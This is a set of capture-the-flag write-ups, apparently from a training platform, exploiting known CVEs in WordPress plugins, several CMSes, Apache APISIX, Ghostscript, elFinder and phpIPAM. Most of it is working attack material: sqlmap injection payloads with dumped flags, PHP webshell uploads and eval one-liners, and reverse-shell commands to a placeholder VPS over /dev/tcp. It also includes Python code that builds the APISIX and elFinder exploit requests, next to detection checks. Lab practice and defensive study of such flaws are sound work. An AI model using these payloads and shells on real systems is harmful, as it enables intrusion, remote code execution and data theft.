Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=wpex_titles&id[]=1 AND (SELECT 3794 FROM (SELECT(SLEEP(2)))UpWn)
---
[03:10:04] [INFO] testing MySQL
[03:10:04] [INFO] confirming MySQL
[03:10:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:10:04] [INFO] fetching columns for table 'flag' in database 'ctf'
[03:10:04] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[03:10:12] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[03:10:15] [INFO] retrieved: flag
[03:10:47] [INFO] fetching entries for table 'flag' in database 'ctf'
[03:10:47] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[03:10:47] [INFO] retrieved: 1
[03:10:51] [WARNING] reflective value(s) found and filtering out of statistical model, please wait
.............................. (done)
flag{39a9ee89-f742-46aa-94b8-248a
[03:16:33] [ERROR] invalid character detected. retrying..
0b238eef}
[03:17:59] [ERROR] invalid character detected. retrying..
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{39a9ee89-f742-46aa-94b8-248a0b238eef} |
CVE-2022-0948
Target description:
The WordPress plugin Order Listener for WooCommerce before version 3.2.2 has an SQL injection vulnerability
https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
0x01 Capture the request, then run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r wp-sql.txt --dbms mysql --test-filter='MySQL MyPayload (SLEEP)' --tech T --time-sec 3 -D ctf -T flag --dump
[*] starting @ 03:35:45 /2023-06-17/
[03:35:45] [INFO] parsing HTTP request from 'wp-sql.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[03:35:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON #1* ((custom) POST)
Type: time-based blind
Title: MySQL MyPayload (SLEEP)
Payload: {"id":" (SELECT SLEEP(3))#"}
---
[03:35:48] [INFO] testing MySQL
[03:36:05] [INFO] confirming MySQL
[03:36:05] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:36:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:36:13] [INFO] fetching columns for table 'flag' in database 'ctf'
[03:36:13] [INFO] retrieved: 1
[03:36:20] [INFO] retrieved: flag
[03:37:11] [INFO] fetching entries for table 'flag' in database 'ctf'
[03:37:11] [INFO] fetching number of entries for table 'flag' in database 'ctf'
[03:37:11] [INFO] retrieved: 1
[03:37:17] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{74aab8
[03:40:16] [ERROR] invalid character detected. retrying..
56-d9cc-417b-bc1a-4
[03:45:20] [ERROR] invalid character detected. retrying..
7
[03:45:44] [ERROR] invalid character detected. retrying..
3e04cdfb1f}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{74aab856-d9cc-417b-bc1a-473e04cdfb1f} |
+--------------------------------------------+
CVE-2022-1014
Target description:
The WordPress plugin WP Contacts Manager <= 2.2.4 does not escape user input sufficiently, leading to SQL injection.
0x01 Capture the request and run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r wp-sql.txt --dbms mysql --level 5 --risk 3 --tech U -D ctf -T flag --dump
[*] starting @ 04:21:09 /2023-06-17/
[04:21:09] [INFO] parsing HTTP request from 'wp-sql.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[04:21:12] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('wp-payment-init=94417c57d1e...7f1d7aa40b'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON #1* ((custom) POST)
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: {"id":"1u0027 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171626271,0x486f515a4463696543426350494464454f6e5151634e6e7744465050424855734b62644b5a786e48,0x7178786271),NULL,NULL,NULL-- - "}
---
[04:21:14] [INFO] testing MySQL
[04:21:14] [INFO] confirming MySQL
[04:21:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[04:21:15] [INFO] fetching columns for table 'flag' in database 'ctf'
[04:21:15] [INFO] fetching entries for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{634833d6-66d7-4d5b-a5db-ba5128c43206} |
+--------------------------------------------+
CVE-2022-32991
Target description:
This CMS has SQL injection in welcome.php.
0x01 First register an account at register.php
0x02 Capture the request and run sqlmap directly
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u 'http://eci-2ze9clflsbycrnudeen8.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=3' --cookie='PHPSESSID=o7hg51g2u1evpbv9577f6aj3tk' --dbms mysql --level 5 --risk 3 -D ctf -T flag --dump
[*] starting @ 03:34:41 /2023-06-18/
[03:34:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: q=quiz&step=2&eid=-5722' OR 4054=4054-- MpfH&n=1&t=3
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8610 FROM(SELECT COUNT(*),CONCAT(0x71716a7871,(SELECT (ELT(8610=8610,1))),0x7171707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WEHO&n=1&t=3
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 2521 FROM (SELECT(SLEEP(5)))QEbQ)-- bEvw&n=1&t=3
---
[03:34:41] [INFO] testing MySQL
[03:34:41] [INFO] confirming MySQL
[03:34:41] [WARNING] reflective value(s) found and filtering out
[03:34:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:34:41] [INFO] fetching columns for table 'flag' in database 'ctf'
[03:34:41] [INFO] retrieved: 'flag'
[03:34:41] [INFO] retrieved: 'varchar(1024)'
[03:34:41] [INFO] fetching entries for table 'flag' in database 'ctf'
[03:34:41] [INFO] retrieved: 'flag{1200a2e3-5580-4a25-933c-15ce8990989e}'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{1200a2e3-5580-4a25-933c-15ce8990989e} |
+--------------------------------------------+
CVE-2021-41947
Target description:
Subrion CMS v4.2.1 has SQL injection
0x01 I didn't find the injection; I read the flag through the database feature instead
CVE-2021-21315
Target description:
systeminformation is a simple package for querying system and OS information
0x01 Just send a GET request (work out what comes after the API path yourself)
0x02 Start a listener on the VPS first, then send another GET to execute /tmp/shell.sh; the VPS gets a shell, then cat /flag
CVE-2022-26201
Target description:
Victor CMS v1.0 has a second-order SQL injection vulnerability
0x01 Capture the request from the search box, then run it through sqlmap
Parameter: search (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: search=asdfasd' OR NOT 6702=6702-- svUW&submit=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: search=asdfasd' AND GTID_SUBSET(CONCAT(0x7162626a71,(SELECT (ELT(2851=2851,1))),0x716b6a7a71),2851)-- nFoG&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=asdfasd' AND (SELECT 3479 FROM (SELECT(SLEEP(5)))JdXG)-- FVfR&submit=
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: search=asdfasd' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162626a71,0x7072484f76784a56476177555a484862736878625766524263706f6245677648446a68516a456753,0x716b6a7a71),NULL,NULL,NULL,NULL,NULL-- -&submit=
CVE-2018-7448
Target description:
CMS Made Simple 2.1.6 has a code injection vulnerability; arbitrary code can be executed via the timezone parameter
https://www.exploit-db.com/exploits/44192
0x01 Follow the exploit-db steps; at step four, insert the PHP code in the timezone field
CVE-2020-13933
Target description:
Apache Shiro has an authentication bypass vulnerability caused by an error in handling authentication requests; a remote attacker can send a specially crafted HTTP request to bypass authentication and gain unauthorized access to the application.
CVE-2022-23043
Zenario CMS 9.2 file upload vulnerability: an attacker can upload a webshell and execute arbitrary commands. Login credentials: admin/adminqwe12
https://blog.csdn.net/niubi707/article/details/128172885 (couldn't be bothered with screenshots)
The WSO2 file upload vulnerability (CVE-2022-29464) is a critical vulnerability in WSO2 discovered by Orange Tsai. It is an unauthenticated, unrestricted arbitrary file upload that lets an unauthenticated attacker gain RCE on the WSO2 server by uploading a malicious JSP file.
taocms 3.0.1: after logging into the back end, the file management section has an arbitrary file download vulnerability
0x01 Log in to the site with admin / tao
0x02 Find the file management page, capture the request and change it to
CVE-2022-24663
Target description:
Remote code execution vulnerability: any subscriber can exploit it by sending a request with the "shortcode" parameter set to PHP Everywhere and execute arbitrary PHP code on the site. P.S. There is a low-privilege user with a common username and a weak password
0x01 Log in with test / test
0x02 Submit the request
<form action="http://eci-2zea4q7aktwogzbj97j8.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
<input name="action" value="parse-media-shortcode"/>
<textarea name="shortcode">[php_everywhere]<?php file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2FiY2QnXSk7ID8+")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute"/>
</form>
0x03 Connect with China Chopper (caidao); the shell is in the web root
CVE-2022-26965
Target description:
Pluck-CMS-Pluck-4.7.16 authenticated RCE in the back end
https://www.exploit-db.com/exploits/50826 (the exploit is a tar archive, but it wouldn't install)
0x01 Log in to the back end, password admin
0x02 Find the theme installation page, zip a one-line webshell named shell.php into shell.zip, upload and install it
0x03 Connect with China Chopper at http://url//data/themes/shell/shell.php
CVE-2022-28525
Target description:
ED01-CMS v20180505 has an arbitrary file upload vulnerability
0x01 Log in to the back end with admin / admin
0x02 Find "add user", upload shell.jpg, capture the request and change the extension to php (the GitHub write-up uses "edit user"; I fiddled with that for ages and it never worked)
0x03 View all users, find the upload path, connect with China Chopper
CVE-2022-25099
Target description:
WBCE CMS v1.5.2 has a vulnerability in /language/install.php; an attacker can craft a file upload to achieve RCE
0x01 Log in to the back end with admin / 123456
0x02 http://url/admin/languages/index.php
0x03 Prepare the PHP file
<?php
echo "i've got a shell!";
eval($_REQUEST['cmd']);
system('cat /flag');
?>
CVE-2022-24112
Target description:
Apache APISIX is a cloud-native microservice API gateway from the Apache Foundation. Built on OpenResty and etcd, it provides dynamic routing and hot plugin reloading and suits API management in a microservice architecture. Apache APISIX has a remote code execution vulnerability that stems from the batch-requests plugin not effectively restricting users' batch requests. An attacker can use it to bypass the Admin API's IP restriction, which can easily lead to remote code execution.
https://raw.githubusercontent.com/Acczdy/CVE-2022-24112_POC/main/CVE-2022-24112_Linux_by_twseptian.py
0x01 Submit the POST request
POST /apisix/batch-requests HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: eci-2zeecfuzcehwb6ukuaq4.cloudeci1.ichunqiu.com:9080
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 504
{"headers": {"X-Real-IP": "127.0.0.1", "X-API-KEY": "edd1c9f034335f136f87ad84b625c8f1", "Content-Type": "application/json"}, "timeout": 1500, "pipeline": [{"path": "/apisix/admin/routes/index", "method": "PUT", "body": "{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/VPSIP/80;sh <&160 >&160 2>&160\\\"'); return true end"}"}]}
0x02 Start a listener on the VPS, then submit the GET request
GET /rms/fzxewh HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: eci-2zeecfuzcehwb6ukuaq4.cloudeci1.ichunqiu.com:9080
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
0x03 The VPS receives the shell; read the flag
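An added example (not part of the original write-up or the linked PoC) that builds the batch-requests body above with json.dumps, so the double encoding of "body" comes out right, and then parses such a body the way a gateway-side or WAF check would. The route uri, name, upstream host and the lhost/lport of the reverse shell are example values; the admin key is the APISIX default that the request above uses.

```python
import json

# The well-known APISIX default Admin API key; it is the X-API-KEY in the request above.
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"


def build_route(uri: str, name: str, lhost: str, lport: int) -> dict:
    """Admin API route object whose filter_func (Lua, run on every match of `uri`)
    executes the reverse shell from the request above. uri, name, lhost and
    lport are example values, not anything taken from a real target."""
    shell = f"0<&160-;exec 160<>/dev/tcp/{lhost}/{lport};sh <&160 >&160 2>&160"
    lua = f"function(vars) os.execute('bash -c \"{shell}\"'); return true end"
    return {
        "uri": uri,
        "upstream": {"type": "roundrobin", "nodes": {"upstream.invalid": 1}},
        "name": name,
        "filter_func": lua,
    }


def build_batch_payload(route: dict, admin_key: str = DEFAULT_ADMIN_KEY,
                        spoofed_ip: str = "127.0.0.1") -> str:
    """Body for POST /apisix/batch-requests. The pipelined sub-request's body is a
    JSON *string*, so json.dumps runs twice; that is why the quotes inside
    "body" in the captured request are backslash-escaped. The X-Real-IP header
    is what the unpatched plugin forwards unchanged, so the Admin API's IP
    allowlist sees 127.0.0.1."""
    outer = {
        "headers": {
            "X-Real-IP": spoofed_ip,
            "X-API-KEY": admin_key,
            "Content-Type": "application/json",
        },
        "timeout": 1500,
        "pipeline": [
            {"path": "/apisix/admin/routes/index", "method": "PUT",
             "body": json.dumps(route, separators=(",", ":"))}
        ],
    }
    return json.dumps(outer)


def decode_inner_bodies(batch_body: str) -> list:
    """Undo the double encoding: the sub-request bodies as the gateway sees them."""
    outer = json.loads(batch_body)
    return [json.loads(step["body"]) for step in outer["pipeline"] if "body" in step]


def suspicious_steps(batch_body: str) -> list:
    """Detection side: a gateway or WAF rule for batch-requests bodies would flag
    exactly these two things, a client-supplied X-Real-IP and any pipeline step
    aimed at the Admin API."""
    outer = json.loads(batch_body)
    findings = []
    headers = {k.lower(): v for k, v in outer.get("headers", {}).items()}
    if "x-real-ip" in headers:
        findings.append(f"client-supplied X-Real-IP={headers['x-real-ip']}")
    for step in outer.get("pipeline", []):
        path = step.get("path", "")
        if path.startswith("/apisix/admin/"):
            findings.append(f"{step.get('method', 'GET')} {path} via batch-requests")
    return findings


if __name__ == "__main__":
    body = build_batch_payload(build_route("/rms/fzxewh", "wthtzv", "VPSIP", 80))
    print(body)
    print(suspicious_steps(body))
```

The fixed versions of the plugin strip X-Real-IP and X-Forwarded-For from the pipelined requests; the check in suspicious_steps is the same idea applied at the edge, and it also fires on any batch step that targets /apisix/admin/, which a legitimate client never needs.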
CVE-2021-40280
Target description:
ZZCMS (站长招商网 content management system) is developed by the ZZCMS team; it combines database optimisation, content caching and AJAX to give sites reliable security, stability and load capacity, with open source and independent functional modules for easy secondary development. ZZCMS 8.2 has a SQL injection in admin/dl_sendmail.php.
0x01 Build the POST request (id[] is an array parameter; the trailing * marks the injection point for sqlmap) and run it straight through sqlmap
POST request:
POST /admin/dl_sendmail.php HTTP/1.1
Host: eci-2ze7wngbkaoiivcu01t8.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=5lfm2c7ngomm8k8rpd3cbuhbf0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
id[0]=0&id[1]=1 *
sqlmap run (time-based blind, hence --tech T and --time-sec 2; the between tamper is there because sqlmap's heuristics reported a WAF/IPS):
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r 'sql zzcms-admin-dl_sendmail.txt' --dbms mysql --level 5 --risk 3 --tech T --time-sec 2 --tamper="between.py" -T flag --dump
(sqlmap banner: {1.7.2#stable} https://sqlmap.org)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:20:32 /2023-07-16/
[08:20:32] [INFO] parsing HTTP request from 'sql zzcms-admin-dl_sendmail.txt'
[08:20:32] [INFO] loading tamper module 'between'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
Array-like data found in POST body. Do you want to process it? [Y/n/q] y
[08:20:33] [INFO] testing connection to the target URL
[08:20:34] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Array-like #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id[0]=0&id[1]=1 ) AND (SELECT 9057 FROM (SELECT(SLEEP(2)))sHZL)-- CsNP
---
[08:20:34] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:20:34] [INFO] testing MySQL
[08:20:34] [INFO] confirming MySQL
[08:20:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[08:20:34] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[08:20:34] [INFO] fetching current database
[08:20:34] [INFO] resumed: zzcms
[08:20:34] [INFO] fetching columns for table 'flag' in database 'zzcms'
[08:20:34] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[08:20:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
1
[08:20:38] [INFO] retrieved: flag
[08:21:04] [INFO] fetching entries for table 'flag' in database 'zzcms'
[08:21:04] [INFO] fetching number of entries for table 'flag' in database 'zzcms'
[08:21:04] [INFO] retrieved: 1
[08:21:07] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{cd5dba6e-209f-49e6-aa6b-f5cd313dae8e}
Database: zzcms
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{cd5dba6e-209f-49e6-aa6b-f5cd313dae8e} |
+--------------------------------------------+
[08:26:28] [INFO] table 'zzcms.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2ze7wngbkaoiivcu01t8.cloudeci1.ichunqiu.com/dump/zzcms/flag.csv'
[08:26:28] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2ze7wngbkaoiivcu01t8.cloudeci1.ichunqiu.com'
[*] ending @ 08:26:28 /2023-07-16/
CVE-2021-40282
Target description:
ZZCMS (站长招商网 content management system) is developed by the ZZCMS team; it combines database optimisation, content caching and AJAX to give sites reliable security, stability and load capacity, with open source and independent functional modules for easy secondary development. ZZCMS 8.3 has a SQL injection in dl/dl_download.php.
0x01 Same as above, except that you must register a user before dl/dl_download.php can be reached. Then capture the request and feed it to sqlmap.
CVE-2018-16509
Target description:
GhostScript's security sandbox can be bypassed: crafted image content can lead to command execution, file reads and file deletion. Python's image-processing module PIL (Pillow) calls GhostScript internally and is therefore affected by CVE-2018-16509.
https://blog.csdn.net/niubi707/article/details/128147965?spm=1001.2101.3001.6650.4&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-4-128147965-blog-115359495.235%5Ev38%5Epc_relevant_sort_base1&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-4-128147965-blog-115359495.235%5Ev38%5Epc_relevant_sort_base1&utm_relevant_index=5
0x01 Following the CSDN post above: write the shell script, make it executable, then run it to get the reverse shell. Ghostscript only executes the command that follows %pipe% in the OutputFile line, so the three commands shown together in the listing below (echo to write /tmp/shell.sh, chmod, bash) each belong in their own %pipe% OutputFile line, sent as separate uploads in that order.
POST / HTTP/1.1
Host: eci-2zea2ydj3fj4t3kyzzgk.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------179587528241366875881954471737
Content-Length: 485
Origin: http://eci-2zea2ydj3fj4t3kyzzgk.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zea2ydj3fj4t3kyzzgk.cloudeci1.ichunqiu.com/
Upgrade-Insecure-Requests: 1
-----------------------------179587528241366875881954471737
Content-Disposition: form-data; name="file"; filename="ghostscript.jpg"
Content-Type: image/jpeg
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%/bin/bash /tmp/shell.sh) currentdevice putdeviceprops
chmod 777 /tmp/shell.sh
echo 'bash -i >& /dev/tcp/VPS/80 0>&1' >> /tmp/shell.sh
-----------------------------179587528241366875881954471737--
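An added example, not from the write-up or the CSDN post: the check an upload handler in front of Pillow/Ghostscript would want. It sniffs whether an "image" is really PostScript regardless of its extension or declared MIME type, and lists the CVE-2018-16509 tokens it carries. The EPS sample is the payload from the request above; the JPEG control bytes are constructed here.

```python
import re

# Constructed sample: the EPS body from the multipart request above (VPS placeholder kept).
SAMPLE_EPS = b"""%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%/bin/bash /tmp/shell.sh) currentdevice putdeviceprops
"""

# Constructed benign control: a JFIF header followed by filler bytes.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32

PS_MAGIC = b"%!PS"

# Tokens that characterise the chain above: undefining setpagedevice, the
# `null restore` error-handling trick behind CVE-2018-16509, and pointing
# OutputFile at a %pipe% device so Ghostscript popen()s a command.
INDICATORS = {
    "pipe_device": re.compile(rb"%pipe%"),
    "outputfile_override": re.compile(rb"/OutputFile\b"),
    "putdeviceprops": re.compile(rb"\bputdeviceprops\b"),
    "setpagedevice_undef": re.compile(rb"/setpagedevice\s+undef"),
    "null_restore": re.compile(rb"\bnull\s+restore\b"),
}


def sniff_upload(data: bytes, declared_mime: str = "") -> dict:
    """Classify an uploaded 'image': is it PostScript regardless of the declared
    type, and which sandbox-escape tokens does it carry. Anything PostScript at
    all is blocked, since Pillow would hand it to Ghostscript as EPS."""
    is_ps = data.lstrip().startswith(PS_MAGIC)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(data))
    return {
        "is_postscript": is_ps,
        "mime_mismatch": is_ps and declared_mime.startswith("image/"),
        "indicators": hits,
        "block": is_ps or bool(hits),
    }


if __name__ == "__main__":
    print(sniff_upload(SAMPLE_EPS, "image/jpeg"))
    print(sniff_upload(SAMPLE_JPEG, "image/jpeg"))
```

The content sniff is the part that matters: the request above names the file ghostscript.jpg with Content-Type image/jpeg, and neither of those is consulted by Pillow when it recognises the %!PS header. The indicator list is for triage only; the fix is a patched Ghostscript (or not passing untrusted EPS to it at all).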
CVE-2022-0543
Target description:
Redis has a code injection vulnerability that an attacker can exploit for remote code execution.
Copied from elsewhere; I did not find anything related to Redis on this target.
http://eci-2ze7rkzaiuviku2zw2rg.cloudeci1.ichunqiu.com/?url=file:///flag
CVE-2022-2073
Target description:
Grav CMS renders pages with Twig; an unsafe configuration allows remote code execution, affecting versions below v1.7.34
0x01 First register an account and log in
0x02 Open Pages and select Home
0x03 Add the payload to the page body (Twig's filter with a PHP callable name applies system() to each element of the array):
{{['cat\x20/flag']|filter('system')}}
0x04 Return to the front page to read the flag
CVE-2021-32682
Target description:
elFinder is an open-source web file manager written in JavaScript with jQuery UI; its design was inspired by the simplicity and convenience of the Finder in Mac OS X. Older versions have a command injection: the archive name reaches the zip command line as an argument.
0x01 Open the editor page
0x02 Create a file 11.txt
0x03 Compress 11.txt into 11.txt.zip
0x04 Compress 11.txt.zip again (into 11.txt.txt.zip) and intercept this request
GET /php/connector.minimal.php?cmd=archive&name=-TvTT=echo '<?php @eval($_POST[a]);?>'>shell1.php%20%23%20a.zip&target=l1_Lw&targets%5B%5D=l1_MTEudHh0LnppcA&type=application%2Fzip&reqid=18bc66965d060 HTTP/1.1
Host: eci-2zefqt4vkubou89ieiqw.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://eci-2zefqt4vkubou89ieiqw.cloudeci1.ichunqiu.com/elfinder.html
Cookie: PHPSESSID=m75cqp2289k62uo1j3vp9o73g5
The name parameter starts with -TvTT=, which Info-ZIP's zip reads as options: -T tests the archive and -TT=<cmd> runs <cmd> as the test program. URL-encode echo '<?php @eval($_POST[a]);?>' in that position, send the request, and the shell is written:
http://eci-2zefqt4vkubou89ieiqw.cloudeci1.ichunqiu.com/files/shell1.php
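An added example (not elFinder's code, and not from the write-up) of the argument injection behind the request above. zip_argv_vulnerable is a hypothetical reconstruction of the pattern: a user-controlled archive name placed where zip still parses options. The hardened form refuses option-looking names and terminates option parsing with `--`. The fixed options -r9 -q and the elFinder hashes in the usage are assumptions.

```python
from urllib.parse import urlencode


def injected_archive_name(cmd: str) -> str:
    """The `name` value from the request above: Info-ZIP's -T tests the archive
    and -TT=<cmd> makes zip run <cmd> as the test program, so <cmd> runs with
    the web server's privileges. `# a.zip` comments out the rest of the command."""
    return f"-TvTT={cmd} # a.zip"


def elfinder_archive_query(cmd: str, target: str, targets: list) -> str:
    """URL-encoded query for connector.minimal.php?cmd=archive (the 'URL-encode
    and send' step above). target/targets are elFinder volume hashes."""
    params = [("cmd", "archive"), ("name", injected_archive_name(cmd)), ("target", target)]
    params += [("targets[]", t) for t in targets]
    params.append(("type", "application/zip"))
    return urlencode(params)


def zip_argv_vulnerable(archive_name: str, files: list) -> list:
    """Hypothetical reconstruction of the flaw (not elFinder's code): the
    user-controlled archive name is appended right after the fixed options, so
    a name beginning with '-' is parsed by zip as further options."""
    return ["zip", "-r9", "-q", archive_name] + files


def zip_argv_hardened(archive_name: str, files: list) -> list:
    """Hardened form: refuse option-looking or path-traversing names and end
    option parsing with '--' so every later argument is positional."""
    if archive_name.startswith("-") or "/" in archive_name or "\x00" in archive_name:
        raise ValueError(f"unsafe archive name: {archive_name!r}")
    return ["zip", "-r9", "-q", "--", archive_name] + files


def user_arg_parsed_as_option(argv: list, user_arg: str) -> bool:
    """True if `user_arg` sits before any '--' terminator and starts with '-',
    i.e. the program would treat it as an option rather than a filename."""
    idx = argv.index(user_arg)
    return "--" not in argv[:idx] and user_arg.startswith("-")


if __name__ == "__main__":
    name = injected_archive_name("echo '<?php @eval($_POST[a]);?>'>shell1.php")
    print(zip_argv_vulnerable(name, ["11.txt.zip"]))
    print(elfinder_archive_query("echo '<?php @eval($_POST[a]);?>'>shell1.php",
                                 "l1_Lw", ["l1_MTEudHh0LnppcA"]))
```

Escaping the name for the shell does not help here: the command is not injected through shell metacharacters but through zip's own option parser, which is why the fix has to be `--` (or an allowlist on the name) rather than quoting.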
CVE-2018-19422
Target description:
Subrion CMS 4.2.1 has a file upload vulnerability
0x01 Find the admin panel link at the top right of the page and log in with admin / admin
0x02 The upload function is at http://url.com/panel/uploads
0x03 Upload a one-liner webshell with its extension changed to .pht, then connect with Caidao
CVE-2019-16692
Target description:
phpIPAM 1.4 has an authenticated SQL injection
PoC: https://www.exploit-db.com/exploits/47438
0x01 Log in to the backend with admin / admin888
0x02 Capture the request (the table parameter is spliced into the query as an identifier; the backtick closes it, and updatexml() gives error-based extraction with * as sqlmap's injection marker):
POST /app/admin/custom-fields/filter-result.php HTTP/1.1
Host: eci-2zeaq9cnps2xi0xscgja.cloudeci1.ichunqiu.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: phpipam=ki8jfm9gdt9dtmcvmu19aarip7
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
